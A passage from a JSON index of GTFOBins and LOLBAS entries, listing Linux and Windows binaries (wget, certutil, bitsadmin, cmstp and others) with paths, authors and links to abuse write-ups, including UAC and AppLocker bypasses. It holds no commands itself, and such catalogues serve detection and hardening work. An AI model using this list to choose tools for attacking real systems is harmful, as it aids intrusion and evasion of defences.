"count":3},{"id":"gtfo:tmate","name":"tmate","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tmate/"],"count":3},{"id":"gtfo:tmux","name":"tmux","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tmux/"],"count":9},{"id":"gtfo:top","name":"top","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/top/"],"count":2},{"id":"gtfo:torify","name":"torify","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/torify/"],"count":2},{"id":"gtfo:torsocks","name":"torsocks","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/torsocks/"],"count":2},{"id":"gtfo:troff","name":"troff","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/troff/"],"count":3},{"id":"gtfo:tsc","name":"tsc","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tsc/"],"count":4},{"id":"gtfo:tshark","name":"tshark","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/tshark/"],"count":2},{"id":"gtfo:ul","name":"ul","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ul/"],"count":3},{"id":"gtfo:unexpand","name":"unexpand","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/unexpand/"],"count":3},{"id":"gtfo:uniq","name":"uniq","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/uniq/"],"count":3},{"id":"gtfo:unshare","name":"unshare","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/unshare/"],"count":3},{"id":"gtfo:unsquashfs","name":"unsquashfs","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/unsquashfs/"],"count":2},{"id":"gtfo:unzip","name":"unzip","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/unzip/"],"count":2},{"id":"gtfo:update-alternatives","name":"update-alternatives","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/update-alternatives/"],"count":2},{"id":"gtfo:urlget","name":"urlget","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/urlget/"],"count":3},{"id":"gtfo:uuencode","name":"uuencode","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/uuencode/"],"count":3},{"id":"gtfo:uv","name":"uv","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/uv/"],"count":2},{"id":"gtfo:vagrant","name":"vagrant","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/vagrant/"],"count":2},{"id":"gtfo:valgrind","name":"valgrind","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/valgrind/"],"count":2},{"id":"gtfo:varnishncsa","name":"varnishncsa","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/varnishncsa/"],"count":2},{"id":"gtfo:vi","name":"vi","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/vi/"],"count":18},{"id":"gtfo:vigr","name":"vigr","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/vigr/"],"count":2},{"id":"gtfo:vim","name":"vim","source":"GTFOBins","platform":["Linux"],"aliases":["nvim","rvim","view","vimdiff"],"references":["https://gtfobins.github.io/gtfobins/vim/"],"count":12},{"id":"gtfo:vipw","name":"vipw","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/vipw/"],"count":2},{"id":"gtfo:virsh","name":"virsh","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/virsh/"],"count":5},{"id":"gtfo:volatility","name":"volatility","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/volatility/"],"count":3},{"id":"gtfo:w3m","name":"w3m","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/w3m/"],"count":3},{"id":"gtfo:wall","name":"wall","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/wall/"],"count":1},{"id":"gtfo:watch","name":"watch","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/watch/"],"count":6},{"id":"gtfo:wc","name":"wc","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/wc/"],"count":3},{"id":"gtfo:wg-quick","name":"wg-quick","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/wg-quick/"],"count":1},{"id":"gtfo:wget","name":"wget","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/wget/"],"count":18},{"id":"gtfo:whiptail","name":"whiptail","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/whiptail/"],"count":3},{"id":"gtfo:whois","name":"whois","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/whois/"],"count":6},{"id":"gtfo:wireshark","name":"wireshark","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/wireshark/"],"count":4},{"id":"gtfo:wish","name":"wish","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/wish/"],"count":3},{"id":"gtfo:xargs","name":"xargs","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/xargs/"],"count":12},{"id":"gtfo:xdg-user-dir","name":"xdg-user-dir","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/xdg-user-dir/"],"count":2},{"id":"gtfo:xdotool","name":"xdotool","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/xdotool/"],"count":3},{"id":"gtfo:xmodmap","name":"xmodmap","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/xmodmap/"],"count":3},{"id":"gtfo:xmore","name":"xmore","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/xmore/"],"count":3},{"id":"gtfo:xpad","name":"xpad","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/xpad/"],"count":3},{"id":"gtfo:xxd","name":"xxd","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/xxd/"],"count":6},{"id":"gtfo:xz","name":"xz","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/xz/"],"count":3},{"id":"gtfo:yarn","name":"yarn","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/yarn/"],"count":6},{"id":"gtfo:yash","name":"yash","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/yash/"],"count":3},{"id":"gtfo:yelp","name":"yelp","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/yelp/"],"count":2},{"id":"gtfo:yt-dlp","name":"yt-dlp","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/yt-dlp/"],"count":2},{"id":"gtfo:yum","name":"yum","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/yum/"],"count":3},{"id":"gtfo:zathura","name":"zathura","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/zathura/"],"count":2},{"id":"gtfo:zcat","name":"zcat","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/zcat/"],"count":2},{"id":"gtfo:zgrep","name":"zgrep","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/zgrep/"],"count":2},{"id":"gtfo:zic","name":"zic","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/zic/"],"count":3},{"id":"gtfo:zip","name":"zip","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/zip/"],"count":6},{"id":"gtfo:zless","name":"zless","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/zless/"],"count":3},{"id":"gtfo:zsh","name":"zsh","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/zsh/"],"count":24},{"id":"gtfo:zsoelim","name":"zsoelim","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/zsoelim/"],"count":3},{"id":"gtfo:zypper","name":"zypper","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/zypper/"],"count":4},{"id":"lolbas:addinutil-exe","name":"AddinUtil.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AddinUtil.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\AddinUtil.exe","C:\\Windows\\Microsoft.NET\\Framework\\v3.5\\AddInUtil.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\AddInUtil.exe"],"author":"Michael McKinley @MckinleyMike","created":"2023-10-05T00:00:00.000Z","contributors":["Michael McKinley @MckinleyMike","Tony Latteri @TheLatteri"],"references":["https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html","https://lolbas-project.github.io/lolbas/Binaries/AddinUtil/"],"count":1},{"id":"lolbas:appinstaller-exe","name":"AppInstaller.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\\AppInstaller.exe"],"author":"Wade Hickey","created":"2020-12-02T00:00:00.000Z","contributors":["Wade Hickey @notwhickey"],"references":["https://twitter.com/notwhickey/status/1333900137232523264","https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/"],"count":1},{"id":"lolbas:applaunch-exe","name":"Applaunch.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Applaunch.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Applaunch.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Applaunch.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Applaunch.exe"],"author":"Nathan Sawyer","created":"2026-08-08T00:00:00.000Z","contributors":["Nathan Sawyer"],"references":["https://nathan2.com/posts/clicktools","https://learn.microsoft.com/en-us/visualstudio/deployment/clickonce-security-and-deployment","https://web.archive.org/web/20060913192623/http://blogs.msdn.com/shawnfa/archive/2005/11/30/498610.aspx","https://lolbas-project.github.io/lolbas/Binaries/Applaunch/"],"count":1},{"id":"lolbas:aspnet-compiler-exe","name":"Aspnet_Compiler.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\aspnet_compiler.exe","c:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\aspnet_compiler.exe"],"author":"Jimmy (@bohops)","created":"2021-09-26T00:00:00.000Z","contributors":["cpl @cpl3h"],"references":["https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/","https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8","https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/"],"count":1},{"id":"lolbas:at-exe","name":"At.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\WINDOWS\\System32\\At.exe","C:\\WINDOWS\\SysWOW64\\At.exe"],"author":"Freddie Barr-Smith","created":"2019-09-20T00:00:00.000Z","contributors":["Freddie Barr-Smith","Riccardo Spolaor","Mariano Graziano","Xabier Ugarte-Pedrero"],"references":["https://freddiebarrsmith.com/at.txt","https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html","https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems","https://lolbas-project.github.io/lolbas/Binaries/At/"],"count":1},{"id":"lolbas:atbroker-exe","name":"Atbroker.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\Atbroker.exe","C:\\Windows\\SysWOW64\\Atbroker.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Adam @hexacorn"],"references":["http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/","https://lolbas-project.github.io/lolbas/Binaries/Atbroker/"],"count":1},{"id":"lolbas:bash-exe","name":"Bash.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\bash.exe","C:\\Windows\\SysWOW64\\bash.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Alex Ionescu @aionescu","Asif Matadar @d1r4c","Liran Ravich, CardinalOps"],"references":["https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules","https://cardinalops.com/blog/bash-and-switch-hijacking-via-windows-subsystem-for-linux/","https://lolbas-project.github.io/lolbas/Binaries/Bash/"],"count":5},{"id":"lolbas:bitsadmin-exe","name":"Bitsadmin.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\bitsadmin.exe","C:\\Windows\\SysWOW64\\bitsadmin.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Rob Fuller @mubix","Chris Gates @carnal0wnage","Oddvar Moe @oddvarmoe"],"references":["https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679","https://www.youtube.com/watch?v=_8xJaaQlpBo","https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://www.soc-labs.top/en/detections/100","https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/"],"count":4},{"id":"lolbas:certoc-exe","name":"CertOC.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\certoc.exe","c:\\windows\\syswow64\\certoc.exe"],"author":"Ensar Samil","created":"2021-10-07T00:00:00.000Z","contributors":["Ensar Samil @sblmsrsn"],"references":["https://twitter.com/sblmsrsn/status/1445758411803480072?s=20","https://twitter.com/sblmsrsn/status/1452941226198671363?s=20","https://lolbas-project.github.io/lolbas/Binaries/CertOC/"],"count":2},{"id":"lolbas:certreq-exe","name":"CertReq.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\certreq.exe","C:\\Windows\\SysWOW64\\certreq.exe"],"author":"David Middlehurst","created":"2020-07-07T00:00:00.000Z","contributors":["David Middlehurst @dtmsecurity"],"references":["https://dtm.uk/certreq","https://lolbas-project.github.io/lolbas/Binaries/CertReq/"],"count":2},{"id":"lolbas:certutil-exe","name":"Certutil.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\certutil.exe","C:\\Windows\\SysWOW64\\certutil.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Matt Graeber @mattifestation","Moriarty @Moriarty_Meng","egre55 @egre55","Lior Adar","Adam @hexacorn","SomeTestLeper @SomeTestLeper"],"references":["https://twitter.com/Moriarty_Meng/status/984380793383370752","https://twitter.com/mattifestation/status/620107926288515072","https://twitter.com/egre55/status/1087685529016193025","https://www.hexacorn.com/blog/2020/08/23/certutil-one-more-gui-lolbin/","https://lolbas-project.github.io/lolbas/Binaries/Certutil/"],"count":7},{"id":"lolbas:change-exe","name":"Change.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\change.exe","c:\\windows\\syswow64\\change.exe"],"author":"Idan Lerman","created":"2025-07-31T00:00:00.000Z","contributors":["Idan Lerman @IdanLerman"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Change/"],"count":1},{"id":"lolbas:cipher-exe","name":"Cipher.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\cipher.exe","c:\\windows\\syswow64\\cipher.exe"],"author":"Adetutu Ogunsowo","created":"2024-11-22T00:00:00.000Z","contributors":["Ade Ogunsowo @i_am_tutu","Alexander Sennhauser @conitrade"],"references":["https://www.volexity.com/blog/2024/11/22/the-nearest-neighbor-attack-how-a-russian-apt-weaponized-nearby-wi-fi-networks-for-covert-access/","https://lolbas-project.github.io/lolbas/Binaries/Cipher/"],"count":2},{"id":"lolbas:cmd-exe","name":"Cmd.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\cmd.exe","C:\\Windows\\SysWOW64\\cmd.exe"],"author":"Ye Yint Min Thu Htut","created":"2019-06-26T00:00:00.000Z","contributors":["r0lan @yeyint_mth","Mr.0range @mr_0rng"],"references":["https://twitter.com/yeyint_mth/status/1143824979139579904","https://twitter.com/Mr_0rng/status/1601408154780446721","https://medium.com/@mr-0range/a-new-lolbin-using-the-windows-type-command-to-upload-download-files-81d7b6179e22","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/type","https://lolbas-project.github.io/lolbas/Binaries/Cmd/"],"count":4},{"id":"lolbas:cmdkey-exe","name":"Cmdkey.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\cmdkey.exe","C:\\Windows\\SysWOW64\\cmdkey.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":[],"references":["https://web.archive.org/web/20230202122017/https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation","https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey","https://lolbas-project.github.io/lolbas/Binaries/Cmdkey/"],"count":1},{"id":"lolbas:cmdl32-exe","name":"cmdl32.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\cmdl32.exe","C:\\Windows\\SysWOW64\\cmdl32.exe"],"author":"Elliot Killick","created":"2021-08-26T00:00:00.000Z","contributors":["Elliot Killick @elliotkillick"],"references":["https://github.com/LOLBAS-Project/LOLBAS/pull/151","https://twitter.com/ElliotKillick/status/1455897435063074824","https://elliotonsecurity.com/living-off-the-land-reverse-engineering-methodology-plus-tips-and-tricks-cmdl32-case-study/","https://lolbas-project.github.io/lolbas/Binaries/cmdl32/"],"count":1},{"id":"lolbas:cmstp-exe","name":"Cmstp.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\cmstp.exe","C:\\Windows\\SysWOW64\\cmstp.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Oddvar Moe @oddvarmoe","Nick Tyrer @NickTyrer","Naor Evgi @ghosts621"],"references":["https://twitter.com/NickTyrer/status/958450014111633408","https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80","https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e","https://oddvar.moe/2017/08/15/research-on-cmstp-exe/","https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1","https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmstp","https://gist.github.com/ghosts621/ea8ad5b8a0904dd40b33f01f0e8285dc","https://lolbas-project.github.io/lolbas/Binaries/Cmstp/"],"count":3},{"id":"lolbas:colorcpl-exe","name":"Colorcpl.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\colorcpl.exe","C:\\Windows\\SysWOW64\\colorcpl.exe"],"author":"Arjan Onwezen","created":"2023-06-26T00:00:00.000Z","contributors":["eral4m @eral4m"],"references":["https://twitter.com/eral4m/status/1480468728324231172","https://lolbas-project.github.io/lolbas/Binaries/Colorcpl/"],"count":1},{"id":"lolbas:computerdefaults-exe","name":"ComputerDefaults.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\ComputerDefaults.exe","C:\\Windows\\SysWOW64\\ComputerDefaults.exe"],"author":"Eron Clarke","created":"2024-09-24T00:00:00.000Z","contributors":["Eron Clarke"],"references":["https://gist.github.com/havoc3-3/812547525107bd138a1a839118a3a44b","https://lolbas-project.github.io/lolbas/Binaries/ComputerDefaults/"],"count":1},{"id":"lolbas:configsecuritypolicy-exe","name":"ConfigSecurityPolicy.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Program Files\\Windows Defender\\ConfigSecurityPolicy.exe","C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.9-0\\ConfigSecurityPolicy.exe"],"author":"Ialle Teixeira","created":"2020-09-04T00:00:00.000Z","contributors":["Ialle Teixeira @NtSetDefault","Nir Chako (Pentera) @C_h4ck_0"],"references":["https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-switch-workloads","https://docs.microsoft.com/en-US/mem/configmgr/comanage/workloads","https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-monitor","https://twitter.com/NtSetDefault/status/1302589153570365440?s=20","https://lolbas-project.github.io/lolbas/Binaries/ConfigSecurityPolicy/"],"count":2},{"id":"lolbas:conhost-exe","name":"Conhost.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\conhost.exe"],"author":"Wietze Beukema","created":"2022-04-05T00:00:00.000Z","contributors":["Adam @hexacorn","Wietze @wietze"],"references":["https://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/","https://twitter.com/Wietze/status/1511397781159751680","https://twitter.com/embee_research/status/1559410767564181504","https://twitter.com/ankit_anubhav/status/1561683123816972288","https://lolbas-project.github.io/lolbas/Binaries/Conhost/"],"count":2},{"id":"lolbas:control-exe","name":"Control.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\control.exe","C:\\Windows\\SysWOW64\\control.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Jimmy @bohops"],"references":["https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/","https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/","https://twitter.com/bohops/status/955659561008017409","https://docs.microsoft.com/en-us/windows/desktop/shell/executing-control-panel-items","https://bohops.com/2018/01/23/loading-alternate-data-stream-ads-dll-cpl-binaries-to-bypass-applocker/","https://lolbas-project.github.io/lolbas/Binaries/Control/"],"count":2},{"id":"lolbas:csc-exe","name":"Csc.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Csc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Csc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v3.5\\csc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\csc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\csc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\csc.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":[],"references":["https://learn.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/","https://lolbas-project.github.io/lolbas/Binaries/Csc/"],"count":2},{"id":"lolbas:cscript-exe","name":"Cscript.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\cscript.exe","C:\\Windows\\SysWOW64\\cscript.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Oddvar Moe @oddvarmoe"],"references":["https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://lolbas-project.github.io/lolbas/Binaries/Cscript/"],"count":1},{"id":"lolbas:customshellhost-exe","name":"CustomShellHost.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\CustomShellHost.exe"],"author":"Wietze Beukema","created":"2021-11-14T00:00:00.000Z","contributors":["John Carroll @YoSignals"],"references":["https://twitter.com/YoSignals/status/1381353520088113154","https://docs.microsoft.com/en-us/windows/configuration/kiosk-shelllauncher","https://lolbas-project.github.io/lolbas/Binaries/CustomShellHost/"],"count":1},{"id":"lolbas:datasvcutil-exe","name":"DataSvcUtil.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\DataSvcUtil.exe"],"author":"Ialle Teixeira","created":"2020-12-01T00:00:00.000Z","contributors":["Ialle Teixeira @NtSetDefault"],"references":["https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe","https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services","https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services","https://lolbas-project.github.io/lolbas/Binaries/DataSvcUtil/"],"count":1},{"id":"lolbas:desktopimgdownldr-exe","name":"Desktopimgdownldr.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\desktopimgdownldr.exe"],"author":"Gal Kristal","created":"2020-06-28T00:00:00.000Z","contributors":["Gal Kristal @gal_kristal"],"references":["https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/","https://lolbas-project.github.io/lolbas/Binaries/Desktopimgdownldr/"],"count":1},{"id":"lolbas:devicecredentialdeployment-exe","name":"DeviceCredentialDeployment.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\DeviceCredentialDeployment.exe"],"author":"Elliot Killick","created":"2021-08-16T00:00:00.000Z","contributors":["Elliot Killick @elliotkillick"],"references":["https://lolbas-project.github.io/lolbas/Binaries/DeviceCredentialDeployment/"],"count":1},{"id":"lolbas:dfsvc-exe","name":"Dfsvc.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Dfsvc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Dfsvc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Dfsvc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Dfsvc.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subtee"],"references":["https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf","https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe","https://lolbas-project.github.io/lolbas/Binaries/Dfsvc/"],"count":1},{"id":"lolbas:diantz-exe","name":"Diantz.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\diantz.exe","c:\\windows\\syswow64\\diantz.exe"],"author":"Tamir Yehuda","created":"2020-08-08T00:00:00.000Z","contributors":["Tamir Yehuda @tim8288","Hai Vaknin @vakninhai"],"references":["https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/diantz","https://ss64.com/nt/makecab-directives.html","https://lolbas-project.github.io/lolbas/Binaries/Diantz/"],"count":3},{"id":"lolbas:diskshadow-exe","name":"Diskshadow.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\diskshadow.exe","C:\\Windows\\SysWOW64\\diskshadow.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Jimmy @bohops"],"references":["https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/","https://lolbas-project.github.io/lolbas/Binaries/Diskshadow/"],"count":2},{"id":"lolbas:dnscmd-exe","name":"Dnscmd.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\Dnscmd.exe","C:\\Windows\\SysWOW64\\Dnscmd.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Shay Ber","Dimitrios Slamaris @dim0x69","Nikhil SamratAshok 